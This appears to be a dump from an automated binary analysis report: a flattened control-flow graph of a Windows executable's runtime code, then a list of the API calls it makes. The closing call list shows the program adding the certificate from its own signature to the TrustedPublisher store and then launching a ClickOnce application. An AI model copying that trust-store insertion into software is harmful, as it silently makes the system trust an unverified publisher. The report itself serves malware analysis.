9b56e2 EnterCriticalSection 5333->5338 5335 9b69ed 5339 9b6a1f 5335->5339 5337 9b6a14 _abort 5337->5331 5338->5335 5342 9b572a LeaveCriticalSection 5339->5342 5341 9b6a26 5341->5337 5342->5341 5349 9b41ae 5343->5349 5345 9b4292 5346 9b421e 5345->5346 5360 9b40b2 5346->5360 5348 9b4242 5348->5237 5350 9b41ba ___scrt_is_nonwritable_in_current_image 5349->5350 5355 9b56e2 EnterCriticalSection 5350->5355 5352 9b41c4 5356 9b41ea 5352->5356 5354 9b41e2 _abort 5354->5345 5355->5352 5359 9b572a LeaveCriticalSection 5356->5359 5358 9b41f4 5358->5354 5359->5358 5361 9b40be ___scrt_is_nonwritable_in_current_image 5360->5361 5368 9b56e2 EnterCriticalSection 5361->5368 5363 9b40c8 5369 9b43d9 5363->5369 5365 9b40e0 5373 9b40f6 5365->5373 5367 9b40ee _abort 5367->5348 5368->5363 5370 9b440f __fassign 5369->5370 5371 9b43e8 __fassign 5369->5371 5370->5365 5371->5370 5376 9b6507 5371->5376 5450 9b572a LeaveCriticalSection 5373->5450 5375 9b4100 5375->5367 5378 9b6587 5376->5378 5379 9b651d 5376->5379 5380 9b4869 _free 15 API calls 5378->5380 5403 9b65d5 5378->5403 5379->5378 5384 9b4869 _free 15 API calls 5379->5384 5386 9b6550 5379->5386 5381 9b65a9 5380->5381 5382 9b4869 _free 15 API calls 5381->5382 5387 9b65bc 5382->5387 5383 9b4869 _free 15 API calls 5388 9b657c 5383->5388 5390 9b6545 5384->5390 5385 9b65e3 5389 9b6643 5385->5389 5401 9b4869 15 API calls _free 5385->5401 5391 9b4869 _free 15 API calls 5386->5391 5402 9b6572 5386->5402 5392 9b4869 _free 15 API calls 5387->5392 5393 9b4869 _free 15 API calls 5388->5393 5394 9b4869 _free 15 API calls 5389->5394 5404 9b6078 5390->5404 5396 9b6567 5391->5396 5397 9b65ca 5392->5397 5393->5378 5398 9b6649 5394->5398 5432 9b6176 5396->5432 5400 9b4869 _free 15 API calls 5397->5400 5398->5370 5400->5403 5401->5385 5402->5383 5444 9b667a 5403->5444 5405 9b6089 5404->5405 5431 9b6172 5404->5431 5406 9b609a 5405->5406 5407 9b4869 _free 15 API calls 5405->5407 5408 9b60ac 5406->5408 5409 9b4869 _free 15 API calls 5406->5409 5407->5406 5410 9b60be 5408->5410 5412 9b4869 _free 15 API calls 5408->5412 5409->5408 5411 9b60d0 5410->5411 5413 9b4869 _free 15 API calls 5410->5413 5414 9b60e2 5411->5414 5415 9b4869 _free 15 API calls 5411->5415 5412->5410 5413->5411 5416 9b60f4 5414->5416 5417 9b4869 _free 15 API calls 5414->5417 5415->5414 5418 9b6106 5416->5418 5420 9b4869 _free 15 API calls 5416->5420 5417->5416 5419 9b6118 5418->5419 5421 9b4869 _free 15 API calls 5418->5421 5422 9b612a 5419->5422 5423 9b4869 _free 15 API calls 5419->5423 5420->5418 5421->5419 5424 9b613c 5422->5424 5425 9b4869 _free 15 API calls 5422->5425 5423->5422 5426 9b614e 5424->5426 5427 9b4869 _free 15 API calls 5424->5427 5425->5424 5428 9b4869 _free 15 API calls 5426->5428 5429 9b6160 5426->5429 5427->5426 5428->5429 5430 9b4869 _free 15 API calls 5429->5430 5429->5431 5430->5431 5431->5386 5433 9b6183 5432->5433 5443 9b61db 5432->5443 5434 9b4869 _free 15 API calls 5433->5434 5437 9b6193 5433->5437 5434->5437 5435 9b61a5 5436 9b61b7 5435->5436 5439 9b4869 _free 15 API calls 5435->5439 5440 9b61c9 5436->5440 5441 9b4869 _free 15 API calls 5436->5441 5437->5435 5438 9b4869 _free 15 API calls 5437->5438 5438->5435 5439->5436 5442 9b4869 _free 15 API calls 5440->5442 5440->5443 5441->5440 5442->5443 5443->5402 5445 9b6687 5444->5445 5449 9b66a5 5444->5449 5446 9b621b __fassign 15 API calls 5445->5446 5445->5449 5447 9b669f 5446->5447 5448 9b4869 _free 15 API calls 5447->5448 5448->5449 5449->5385 5450->5375 5483 9b6a82 5451->5483 5454 9b6b6f 5455 9b6b7b _abort 5454->5455 5459 9b6ba8 _abort 5455->5459 5461 9b6ba2 _abort 5455->5461 5497 9b44a8 GetLastError 5455->5497 5457 9b6bf4 5458 9b47f9 __dosmaperr 15 API calls 5457->5458 5460 9b6bf9 5458->5460 5465 9b6c20 5459->5465 5519 9b56e2 EnterCriticalSection 5459->5519 5516 9b473d 5460->5516 5461->5457 5461->5459 5464 9b6bd7 _abort 5461->5464 5464->5308 5466 9b6c7f 5465->5466 5472 9b6c77 5465->5472 5476 9b6caa 5465->5476 5520 9b572a LeaveCriticalSection 5465->5520 5466->5476 5521 9b6b66 5466->5521 5469 9b3793 _abort 23 API calls 5469->5466 5472->5469 5473 9b4424 _abort 33 API calls 5477 9b6d0d 5473->5477 5475 9b6b66 _abort 33 API calls 5475->5476 5524 9b6d2f 5476->5524 5477->5464 5478 9b4424 _abort 33 API calls 5477->5478 5478->5464 5480 9b458f _abort 5479->5480 5481 9b45bb IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 5480->5481 5482 9b468c _abort _ValidateLocalCookies 5481->5482 5482->5315 5486 9b6a28 5483->5486 5485 9b3f29 5485->5308 5485->5454 5487 9b6a34 ___scrt_is_nonwritable_in_current_image 5486->5487 5492 9b56e2 EnterCriticalSection 5487->5492 5489 9b6a42 5493 9b6a76 5489->5493 5491 9b6a69 _abort 5491->5485 5492->5489 5496 9b572a LeaveCriticalSection 5493->5496 5495 9b6a80 5495->5491 5496->5495 5498 9b44c1 5497->5498 5502 9b44c7 5497->5502 5500 9b5904 _abort 6 API calls 5498->5500 5499 9b480c _abort 12 API calls 5501 9b44d9 5499->5501 5500->5502 5504 9b44e1 5501->5504 5506 9b595a _abort 6 API calls 5501->5506 5502->5499 5503 9b451e SetLastError 5502->5503 5505 9b4527 5503->5505 5507 9b4869 _free 12 API calls 5504->5507 5505->5461 5508 9b44f6 5506->5508 5509 9b44e7 5507->5509 5508->5504 5510 9b44fd 5508->5510 5511 9b4515 SetLastError 5509->5511 5512 9b4296 _abort 12 API calls 5510->5512 5511->5505 5513 9b4508 5512->5513 5514 9b4869 _free 12 API calls 5513->5514 5515 9b450e 5514->5515 5515->5503 5515->5511 5528 9b46c2 5516->5528 5518 9b4749 5518->5464 5519->5465 5520->5472 5522 9b4424 _abort 33 API calls 5521->5522 5523 9b6b6b 5522->5523 5523->5475 5525 9b6cfe 5524->5525 5526 9b6d35 5524->5526 5525->5464 5525->5473 5525->5477 5540 9b572a LeaveCriticalSection 5526->5540 5529 9b44a8 __dosmaperr 15 API calls 5528->5529 5530 9b46d8 5529->5530 5534 9b46e6 _ValidateLocalCookies 5530->5534 5536 9b474d IsProcessorFeaturePresent 5530->5536 5532 9b473c 5533 9b46c2 _abort 21 API calls 5532->5533 5535 9b4749 5533->5535 5534->5518 5535->5518 5537 9b4758 5536->5537 5538 9b4573 _abort 3 API calls 5537->5538 5539 9b476d GetCurrentProcess TerminateProcess 5538->5539 5539->5532 5540->5525 5541->5247 5545 9b572a LeaveCriticalSection 5542->5545 5544 9b52e1 5544->5247 5545->5544 5547 9b3f8f 5546->5547 5553 9b3f85 5546->5553 5548 9b4424 _abort 33 API calls 5547->5548 5547->5553 5549 9b3fb0 5548->5549 5554 9b72d1 5549->5554 5553->5252 5553->5253 5555 9b72e4 5554->5555 5557 9b3fc9 5554->5557 5555->5557 5562 9b6754 5555->5562 5558 9b72fe 5557->5558 5559 9b7326 5558->5559 5560 9b7311 5558->5560 5559->5553 5560->5559 5561 9b5249 __fassign 33 API calls 5560->5561 5561->5559 5563 9b6760 ___scrt_is_nonwritable_in_current_image 5562->5563 5564 9b4424 _abort 33 API calls 5563->5564 5565 9b6769 5564->5565 5566 9b67b7 _abort 5565->5566 5574 9b56e2 EnterCriticalSection 5565->5574 5566->5557 5568 9b6787 5575 9b67cb 5568->5575 5573 9b3f24 _abort 33 API calls 5573->5566 5574->5568 5576 9b679b 5575->5576 5577 9b67d9 __fassign 5575->5577 5579 9b67ba 5576->5579 5577->5576 5578 9b6507 __fassign 15 API calls 5577->5578 5578->5576 5582 9b572a LeaveCriticalSection 5579->5582 5581 9b67ae 5581->5566 5581->5573 5582->5581 5586 9b507a _ValidateLocalCookies 5583->5586 5587 9b4fd0 5583->5587 5585 9b5031 5603 9b7cd1 5585->5603 5586->5266 5591 9b634d 5587->5591 5590 9b7cd1 38 API calls 5590->5586 5592 9b3f72 __fassign 33 API calls 5591->5592 5593 9b636d MultiByteToWideChar 5592->5593 5595 9b63ab 5593->5595 5598 9b6443 _ValidateLocalCookies 5593->5598 5597 9b62ff 16 API calls 5595->5597 5600 9b63cc _abort __alloca_probe_16 5595->5600 5596 9b643d 5608 9b646a 5596->5608 5597->5600 5598->5585 5600->5596 5601 9b6411 MultiByteToWideChar 5600->5601 5601->5596 5602 9b642d GetStringTypeW 5601->5602 5602->5596 5604 9b3f72 __fassign 33 API calls 5603->5604 5605 9b7ce4 5604->5605 5612 9b7ab4 5605->5612 5607 9b5052 5607->5590 5609 9b6487 5608->5609 5610 9b6476 5608->5610 5609->5598 5610->5609 5611 9b4869 _free 15 API calls 5610->5611 5611->5609 5613 9b7acf 5612->5613 5614 9b7af5 MultiByteToWideChar 5613->5614 5615 9b7b1f 5614->5615 5616 9b7ca9 _ValidateLocalCookies 5614->5616 5617 9b62ff 16 API calls 5615->5617 5620 9b7b40 __alloca_probe_16 5615->5620 5616->5607 5617->5620 5618 9b7b89 MultiByteToWideChar 5619 9b7bf5 5618->5619 5621 9b7ba2 5618->5621 5623 9b646a __freea 15 API calls 5619->5623 5620->5618 5620->5619 5637 9b5a15 5621->5637 5623->5616 5624 9b7bb9 5624->5619 5625 9b7bcc 5624->5625 5626 9b7c04 5624->5626 5625->5619 5628 9b5a15 6 API calls 5625->5628 5629 9b62ff 16 API calls 5626->5629 5632 9b7c25 __alloca_probe_16 5626->5632 5627 9b7c9a 5631 9b646a __freea 15 API calls 5627->5631 5628->5619 5629->5632 5630 9b5a15 6 API calls 5633 9b7c79 5630->5633 5631->5619 5632->5627 5632->5630 5633->5627 5634 9b7c88 WideCharToMultiByte 5633->5634 5634->5627 5635 9b7cc8 5634->5635 5636 9b646a __freea 15 API calls 5635->5636 5636->5619 5638 9b5741 _abort 5 API calls 5637->5638 5639 9b5a3c 5638->5639 5642 9b5a45 _ValidateLocalCookies 5639->5642 5643 9b5a9d 5639->5643 5641 9b5a85 LCMapStringW 5641->5642 5642->5624 5644 9b5741 _abort 5 API calls 5643->5644 5645 9b5ac4 _ValidateLocalCookies 5644->5645 5645->5641 5647 9b4d5d ___scrt_is_nonwritable_in_current_image 5646->5647 5654 9b56e2 EnterCriticalSection 5647->5654 5649 9b4d67 5655 9b4dbc 5649->5655 5653 9b4d80 _abort 5653->5282 5654->5649 5667 9b54dc 5655->5667 5657 9b4e0a 5658 9b54dc 21 API calls 5657->5658 5659 9b4e26 5658->5659 5660 9b54dc 21 API calls 5659->5660 5661 9b4e44 5660->5661 5662 9b4d74 5661->5662 5663 9b4869 _free 15 API calls 5661->5663 5664 9b4d88 5662->5664 5663->5662 5681 9b572a LeaveCriticalSection 5664->5681 5666 9b4d92 5666->5653 5668 9b54ed 5667->5668 5677 9b54e9 5667->5677 5669 9b54f4 5668->5669 5672 9b5507 _abort 5668->5672 5670 9b47f9 __dosmaperr 15 API calls 5669->5670 5671 9b54f9 5670->5671 5673 9b473d _abort 21 API calls 5671->5673 5674 9b553e 5672->5674 5675 9b5535 5672->5675 5672->5677 5673->5677 5674->5677 5679 9b47f9 __dosmaperr 15 API calls 5674->5679 5676 9b47f9 __dosmaperr 15 API calls 5675->5676 5678 9b553a 5676->5678 5677->5657 5680 9b473d _abort 21 API calls 5678->5680 5679->5678 5680->5677 5681->5666 5683 9b3f72 __fassign 33 API calls 5682->5683 5684 9b5571 5683->5684 5684->5073 5686 9b356a _abort 5685->5686 5687 9b3583 5686->5687 5688 9b3571 5686->5688 5702 9b56e2 EnterCriticalSection 5687->5702 5714 9b36b8 GetModuleHandleW 5688->5714 5694 9b3582 5694->5687 5696 9b3671 _abort 5696->5098 5697 9b35ff _abort 5703 9b3668 5697->5703 5700 9b358a 5700->5697 5722 9b3c97 5700->5722 5702->5700 5725 9b572a LeaveCriticalSection 5703->5725 5705 9b3641 5705->5696 5706 9b3677 5705->5706 5726 9b5b1f 5706->5726 5708 9b3681 5709 9b36a5 5708->5709 5710 9b3685 GetPEB 5708->5710 5712 9b36fc _abort 3 API calls 5709->5712 5710->5709 5711 9b3695 GetCurrentProcess TerminateProcess 5710->5711 5711->5709 5713 9b36ad ExitProcess 5712->5713 5715 9b3576 5714->5715 5715->5687 5716 9b36fc GetModuleHandleExW 5715->5716 5717 9b3749 5716->5717 5718 9b3726 GetProcAddress 5716->5718 5719 9b374f FreeLibrary 5717->5719 5720 9b3758 _ValidateLocalCookies 5717->5720 5721 9b373b 5718->5721 5719->5720 5720->5694 5721->5717 5731 9b39d0 5722->5731 5725->5705 5727 9b5b3a _ValidateLocalCookies 5726->5727 5728 9b5b44 5726->5728 5727->5708 5729 9b5741 _abort 5 API calls 5728->5729 5730 9b5b5b 5729->5730 5730->5727 5734 9b397f 5731->5734 5733 9b39f4 5733->5697 5735 9b398b ___scrt_is_nonwritable_in_current_image 5734->5735 5742 9b56e2 EnterCriticalSection 5735->5742 5737 9b3999 5743 9b3a20 5737->5743 5739 9b39a6 5747 9b39c4 5739->5747 5741 9b39b7 _abort 5741->5733 5742->5737 5744 9b3a48 5743->5744 5746 9b3a40 _ValidateLocalCookies 5743->5746 5745 9b4869 _free 15 API calls 5744->5745 5744->5746 5745->5746 5746->5739 5750 9b572a LeaveCriticalSection 5747->5750 5749 9b39ce 5749->5741 5750->5749 6740 9b324d 6741 9b522b 46 API calls 6740->6741 6742 9b325f 6741->6742 6751 9b561e GetEnvironmentStringsW 6742->6751 6745 9b326a 6747 9b4869 _free 15 API calls 6745->6747 6748 9b329f 6747->6748 6749 9b3275 6750 9b4869 _free 15 API calls 6749->6750 6750->6745 6752 9b5635 6751->6752 6762 9b5688 6751->6762 6755 9b563b WideCharToMultiByte 6752->6755 6753 9b3264 6753->6745 6763 9b32a5 6753->6763 6754 9b5691 FreeEnvironmentStringsW 6754->6753 6756 9b5657 6755->6756 6755->6762 6757 9b62ff 16 API calls 6756->6757 6758 9b565d 6757->6758 6759 9b5664 WideCharToMultiByte 6758->6759 6760 9b567a 6758->6760 6759->6760 6761 9b4869 _free 15 API calls 6760->6761 6761->6762 6762->6753 6762->6754 6764 9b32ba 6763->6764 6765 9b480c _abort 15 API calls 6764->6765 6770 9b32e1 6765->6770 6766 9b3345 6767 9b4869 _free 15 API calls 6766->6767 6768 9b335f 6767->6768 6768->6749 6769 9b480c _abort 15 API calls 6769->6770 6770->6766 6770->6769 6771 9b3347 6770->6771 6775 9b3369 6770->6775 6778 9b4869 _free 15 API calls 6770->6778 6780 9b3eca 6770->6780 6773 9b3376 15 API calls 6771->6773 6774 9b334d 6773->6774 6776 9b4869 _free 15 API calls 6774->6776 6777 9b474d _abort 6 API calls 6775->6777 6776->6766 6779 9b3375 6777->6779 6778->6770 6781 9b3ee5 6780->6781 6782 9b3ed7 6780->6782 6783 9b47f9 __dosmaperr 15 API calls 6781->6783 6782->6781 6787 9b3efc 6782->6787 6784 9b3eed 6783->6784 6785 9b473d _abort 21 API calls 6784->6785 6786 9b3ef7 6785->6786 6786->6770 6787->6786 6788 9b47f9 __dosmaperr 15 API calls 6787->6788 6788->6784 6016 9b9ec3 6017 9b9ed9 6016->6017 6018 9b9ecd 6016->6018 6018->6017 6019 9b9ed2 CloseHandle 6018->6019 6019->6017 5751 9b1442 5752 9b1a6a GetModuleHandleW 5751->5752 5753 9b144a 5752->5753 5754 9b144e 5753->5754 5755 9b1480 5753->5755 5758 9b1459 5754->5758 5760 9b3775 5754->5760 5756 9b3793 _abort 23 API calls 5755->5756 5759 9b1488 5756->5759 5761 9b355e _abort 23 API calls 5760->5761 5762 9b3780 5761->5762 5762->5758 6789 9b3d41 6792 9b341b 6789->6792 6793 9b342a 6792->6793 6794 9b3376 15 API calls 6793->6794 6795 9b3444 6794->6795 6796 9b3376 15 API calls 6795->6796 6797 9b344f 6796->6797 6544 9b3400 6545 9b3418 6544->6545 6546 9b3412 6544->6546 6547 9b3376 15 API calls 6546->6547 6547->6545 6548 9b1e00 6549 9b1e1e ___except_validate_context_record _ValidateLocalCookies __IsNonwritableInCurrentImage 6548->6549 6550 9b1e9e _ValidateLocalCookies 6549->6550 6553 9b2340 RtlUnwind 6549->6553 6552 9b1f27 _ValidateLocalCookies 6553->6552 5828 9b3d86 5829 9b1f7d ___scrt_uninitialize_crt 7 API calls 5828->5829 5830 9b3d8d 5829->5830 6798 9b9146 IsProcessorFeaturePresent 6020 9b98c5 6022 9b98ed 6020->6022 6021 9b9925 6022->6021 6023 9b991e 6022->6023 6024 9b9917 6022->6024 6033 9b9980 6023->6033 6029 9b9997 6024->6029 6030 9b99a0 6029->6030 6037 9ba06f 6030->6037 6032 9b991c 6034 9b99a0 6033->6034 6035 9ba06f __startOneArgErrorHandling 16 API calls 6034->6035 6036 9b9923 6035->6036 6038 9ba0ae __startOneArgErrorHandling 6037->6038 6040 9ba130 __startOneArgErrorHandling 6038->6040 6043 9ba472 6038->6043 6042 9ba166 _ValidateLocalCookies 6040->6042 6046 9ba786 6040->6046 6042->6032 6053 9ba495 6043->6053 6047 9ba7a8 6046->6047 6048 9ba793 6046->6048 6050 9b47f9 __dosmaperr 15 API calls 6047->6050 6049 9ba7ad 6048->6049 6051 9b47f9 __dosmaperr 15 API calls 6048->6051 6049->6042 6050->6049 6052 9ba7a0 6051->6052 6052->6042 6054 9ba4c0 __raise_exc 6053->6054 6055 9ba6b9 RaiseException 6054->6055 6056 9ba490 6055->6056 6056->6040 5831 9b48bb 5832 9b48cb 5831->5832 5833 9b48e1 5831->5833 5834 9b47f9 __dosmaperr 15 API calls 5832->5834 5843 9b4a2c 5833->5843 5845 9b494b 5833->5845 5850 9b4a4b 5833->5850 5835 9b48d0 5834->5835 5836 9b473d _abort 21 API calls 5835->5836 5838 9b48da 5836->5838 5840 9b49b9 5841 9b4869 _free 15 API calls 5840->5841 5841->5843 5842 9b49b0 5842->5840 5847 9b4a3e 5842->5847 5867 9b79bb 5842->5867 5876 9b4c65 5843->5876 5861 9b31ec 5845->5861 5848 9b474d _abort 6 API calls 5847->5848 5849 9b4a4a 5848->5849 5851 9b4a57 5850->5851 5851->5851 5852 9b480c _abort 15 API calls 5851->5852 5853 9b4a85 5852->5853 5854 9b79bb 21 API calls 5853->5854 5855 9b4ab1 5854->5855 5856 9b474d _abort 6 API calls 5855->5856 5857 9b4ae0 _abort 5856->5857 5858 9b4b81 FindFirstFileExA 5857->5858 5859 9b4bd0 5858->5859 5860 9b4a4b 21 API calls 5859->5860 5862 9b3201 5861->5862 5863 9b31fd 5861->5863 5862->5863 5864 9b480c _abort 15 API calls 5862->5864 5863->5842 5865 9b322f 5864->5865 5866 9b4869 _free 15 API calls 5865->5866 5866->5863 5869 9b790a 5867->5869 5868 9b791f 5870 9b47f9 __dosmaperr 15 API calls 5868->5870 5871 9b7924 5868->5871 5869->5868 5869->5871 5874 9b795b 5869->5874 5872 9b794a 5870->5872 5871->5842 5873 9b473d _abort 21 API calls 5872->5873 5873->5871 5874->5871 5875 9b47f9 __dosmaperr 15 API calls 5874->5875 5875->5872 5877 9b4c6f 5876->5877 5878 9b4c7f 5877->5878 5879 9b4869 _free 15 API calls 5877->5879 5880 9b4869 _free 15 API calls 5878->5880 5879->5877 5881 9b4c86 5880->5881 5881->5838 5882 9b14bb IsProcessorFeaturePresent 5883 9b14d0 5882->5883 5886 9b1493 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5883->5886 5885 9b15b3 5886->5885 6057 9b12fb 6062 9b1aac SetUnhandledExceptionFilter 6057->6062 6059 9b1300 6063 9b38f9 6059->6063 6061 9b130b 6062->6059 6064 9b391f 6063->6064 6065 9b3905 6063->6065 6064->6061 6065->6064 6066 9b47f9 __dosmaperr 15 API calls 6065->6066 6067 9b390f 6066->6067 6068 9b473d _abort 21 API calls 6067->6068 6069 9b391a 6068->6069 6069->6061 5887 9b1ab8 5888 9b1aef 5887->5888 5889 9b1aca 5887->5889 5889->5888 5896 9b209a 5889->5896 5908 9b23c3 5896->5908 5899 9b20a3 5900 9b23c3 43 API calls 5899->5900 5901 9b1b06 5900->5901 5902 9b3e89 5901->5902 5903 9b3e95 _abort 5902->5903 5904 9b4424 _abort 33 API calls 5903->5904 5905 9b3e9a 5904->5905 5906 9b3f24 _abort 33 API calls 5905->5906 5907 9b3ec4 5906->5907 5922 9b23d1 5908->5922 5910 9b23c8 5911 9b1afc 5910->5911 5912 9b6b14 _abort 2 API calls 5910->5912 5911->5899 5913 9b3f29 5912->5913 5914 9b3f35 5913->5914 5917 9b6b6f _abort 33 API calls 5913->5917 5915 9b3f5c 5914->5915 5916 9b3f3e IsProcessorFeaturePresent 5914->5916 5919 9b3793 _abort 23 API calls 5915->5919 5918 9b3f49 5916->5918 5917->5914 5920 9b4573 _abort 3 API calls 5918->5920 5921 9b3f66 5919->5921 5920->5915 5923 9b23da 5922->5923 5924 9b23dd GetLastError 5922->5924 5923->5910 5934 9b26a4 5924->5934 5927 9b2457 SetLastError 5927->5910 5928 9b26df ___vcrt_FlsSetValue 6 API calls 5929 9b240b 5928->5929 5930 9b2433 5929->5930 5931 9b26df ___vcrt_FlsSetValue 6 API calls 5929->5931 5933 9b2411 5929->5933 5932 9b26df ___vcrt_FlsSetValue 6 API calls 5930->5932 5930->5933 5931->5930 5932->5933 5933->5927 5935 9b2543 ___vcrt_FlsGetValue 5 API calls 5934->5935 5936 9b26be 5935->5936 5937 9b26d6 TlsGetValue 5936->5937 5938 9b23f2 5936->5938 5937->5938 5938->5927 5938->5928 5938->5933 6554 9b383f 6555 9b384b ___scrt_is_nonwritable_in_current_image 6554->6555 6556 9b3882 _abort 6555->6556 6562 9b56e2 EnterCriticalSection 6555->6562 6558 9b385f 6559 9b67cb __fassign 15 API calls 6558->6559 6560 9b386f 6559->6560 6563 9b3888 6560->6563 6562->6558 6566 9b572a LeaveCriticalSection 6563->6566 6565 9b388f 6565->6556 6566->6565 6070 9b8df1 6071 9b8e15 6070->6071 6072 9b8e2e 6071->6072 6074 9b9beb __startOneArgErrorHandling 6071->6074 6075 9b8e78 6072->6075 6078 9b99d3 6072->6078 6077 9b9c2d __startOneArgErrorHandling 6074->6077 6086 9ba1c4 6074->6086 6079 9b99f0 DecodePointer 6078->6079 6081 9b9a00 6078->6081 6079->6081 6080 9b9a82 _ValidateLocalCookies 6080->6075 6081->6080 6082 9b9a8d 6081->6082 6083 9b9a37 6081->6083 6082->6080 6084 9b47f9 __dosmaperr 15 API calls 6082->6084 6083->6080 6085 9b47f9 __dosmaperr 15 API calls 6083->6085 6084->6080 6085->6080 6087 9ba1fd __startOneArgErrorHandling 6086->6087 6088 9ba495 __raise_exc RaiseException 6087->6088 6089 9ba224 __startOneArgErrorHandling 6087->6089 6088->6089 6090 9ba267 6089->6090 6091 9ba242 6089->6091 6092 9ba786 __startOneArgErrorHandling 15 API calls 6090->6092 6095 9ba7b5 6091->6095 6094 9ba262 __startOneArgErrorHandling _ValidateLocalCookies 6092->6094 6094->6077 6096 9ba7c4 6095->6096 6097 9ba838 __startOneArgErrorHandling 6096->6097 6098 9ba7e3 __startOneArgErrorHandling 6096->6098 6099 9ba786 __startOneArgErrorHandling 15 API calls 6097->6099 6100 9ba786 __startOneArgErrorHandling 15 API calls 6098->6100 6101 9ba831 6098->6101 6099->6101 6100->6101 6101->6094 6799 9b7570 6800 9b75a9 6799->6800 6801 9b47f9 __dosmaperr 15 API calls 6800->6801 6805 9b75d5 _ValidateLocalCookies 6800->6805 6802 9b75b2 6801->6802 6803 9b473d _abort 21 API calls 6802->6803 6804 9b75bd _ValidateLocalCookies 6803->6804 5939 9b3eb5 5940 9b3eb8 5939->5940 5941 9b3f24 _abort 33 API calls 5940->5941 5942 9b3ec4 5941->5942 6102 9b1ff4 6105 9b2042 6102->6105 6106 9b1fff 6105->6106 6107 9b204b 6105->6107 6107->6106 6108 9b23c3 43 API calls 6107->6108 6109 9b2086 6108->6109 6110 9b23c3 43 API calls 6109->6110 6111 9b2091 6110->6111 6112 9b3e89 33 API calls 6111->6112 6113 9b2099 6112->6113 6114 9b9beb 6115 9b9c04 __startOneArgErrorHandling 6114->6115 6116 9ba1c4 16 API calls 6115->6116 6117 9b9c2d __startOneArgErrorHandling 6115->6117 6116->6117 6567 9b142e 6570 9b2cf0 6567->6570 6569 9b143f 6571 9b44a8 __dosmaperr 15 API calls 6570->6571 6572 9b2d07 _ValidateLocalCookies 6571->6572 6572->6569 6573 9b452d 6581 9b5858 6573->6581 6575 9b4537 6576 9b4541 6575->6576 6577 9b44a8 __dosmaperr 15 API calls 6575->6577 6578 9b4549 6577->6578 6579 9b4556 6578->6579 6586 9b4559 6578->6586 6582 9b5741 _abort 5 API calls 6581->6582 6583 9b587f 6582->6583 6584 9b5897 TlsAlloc 6583->6584 6585 9b5888 _ValidateLocalCookies 6583->6585 6584->6585 6585->6575 6587 9b4563 6586->6587 6588 9b4569 6586->6588 6590 9b58ae 6587->6590 6588->6576 6591 9b5741 _abort 5 API calls 6590->6591 6592 9b58d5 6591->6592 6593 9b58ed TlsFree 6592->6593 6594 9b58e1 _ValidateLocalCookies 6592->6594 6593->6594 6594->6588 5943 9b56a1 5944 9b56ac 5943->5944 5946 9b56d5 5944->5946 5947 9b56d1 5944->5947 5949 9b59b3 5944->5949 5954 9b56f9 5946->5954 5950 9b5741 _abort 5 API calls 5949->5950 5951 9b59da 5950->5951 5952 9b59f8 InitializeCriticalSectionAndSpinCount 5951->5952 5953 9b59e3 _ValidateLocalCookies 5951->5953 5952->5953 5953->5944 5955 9b5725 5954->5955 5956 9b5706 5954->5956 5955->5947 5957 9b5710 DeleteCriticalSection 5956->5957 5957->5955 5957->5957 6118 9b8ce1 6119 9b8d01 6118->6119 6122 9b8d38 6119->6122 6121 9b8d2b 6124 9b8d3f 6122->6124 6123 9b8da0 6125 9b9997 16 API calls 6123->6125 6126 9b988e 6123->6126 6124->6123 6128 9b8d5f 6124->6128 6127 9b8dee 6125->6127 6126->6121 6127->6121 6128->6126 6129 9b9997 16 API calls 6128->6129 6130 9b98be 6129->6130 6130->6121 6806 9b9160 6809 9b917e 6806->6809 6808 9b9176 6810 9b9183 6809->6810 6811 9b99d3 16 API calls 6810->6811 6812 9b9218 6810->6812 6813 9b93af 6811->6813 6812->6808 6813->6808 5958 9b5ba6 5959 9b5bd7 5958->5959 5960 9b5bb1 5958->5960 5960->5959 5961 9b5bc1 FreeLibrary 5960->5961 5961->5960 6595 9b6026 6596 9b602b 6595->6596 6597 9b604e 6596->6597 6599 9b5c56 6596->6599 6600 9b5c85 6599->6600 6601 9b5c63 6599->6601 6600->6596 6602 9b5c7f 6601->6602 6603 9b5c71 DeleteCriticalSection 6601->6603 6604 9b4869 _free 15 API calls 6602->6604 6603->6602 6603->6603 6604->6600 6131 9b33e5 6132 9b33fd 6131->6132 6133 9b33f7 6131->6133 6135 9b3376 6133->6135 6139 9b3383 6135->6139 6140 9b33a0 6135->6140 6136 9b339a 6138 9b4869 _free 15 API calls 6136->6138 6137 9b4869 _free 15 API calls 6137->6139 6138->6140 6139->6136 6139->6137 6140->6132

                                                                                                                                                  Control-flow Graph

                                                                                                                                                  APIs
                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00000104), ref: 009B1016
                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,00000000,00000104), ref: 009B1025
                                                                                                                                                  • CertOpenSystemStoreA.CRYPT32(00000000,TrustedPublisher), ref: 009B1032
                                                                                                                                                  • LocalAlloc.KERNELBASE(00000000,00040000), ref: 009B1057
                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00040000), ref: 009B1063
                                                                                                                                                  • CryptQueryObject.CRYPT32(00000001,00000000,00000400,00000002,00000000,00000000,00000000,00000000,00000000,?,00000000), ref: 009B1082
                                                                                                                                                  • CryptMsgGetParam.CRYPT32(?,0000000B,00000000,?,?), ref: 009B10B2
                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,?), ref: 009B10C5
                                                                                                                                                  • LocalAlloc.KERNEL32(00000000,00002000), ref: 009B10F4
                                                                                                                                                  • CryptMsgGetParam.CRYPT32(?,0000000C,00000000,00000000,00002000), ref: 009B110A
                                                                                                                                                  • CertCreateCertificateContext.CRYPT32(00000001,00000000,00002000), ref: 009B111A
                                                                                                                                                  • CertAddCertificateContextToStore.CRYPT32(?,00000000,00000001,00000000), ref: 009B112D
                                                                                                                                                  • CertFreeCertificateContext.CRYPT32(00000000), ref: 009B1134
                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 009B113E
                                                                                                                                                  • LocalFree.KERNEL32(00000000), ref: 009B115D
                                                                                                                                                  • CryptMsgGetParam.CRYPT32(?,00000009,00000000,00000000,00040000), ref: 009B116E
                                                                                                                                                  • CryptMsgGetParam.CRYPT32(?,0000000A,00000000,?,00040000), ref: 009B1182
                                                                                                                                                  • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,00000000,?), ref: 009B1198
                                                                                                                                                  • CertFindAttribute.CRYPT32(1.3.6.1.4.1.311.4.1.1,?,?), ref: 009B11A9
                                                                                                                                                  • LoadLibraryA.KERNELBASE(dfshim), ref: 009B11BA
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,ShOpenVerbApplicationW), ref: 009B11C6
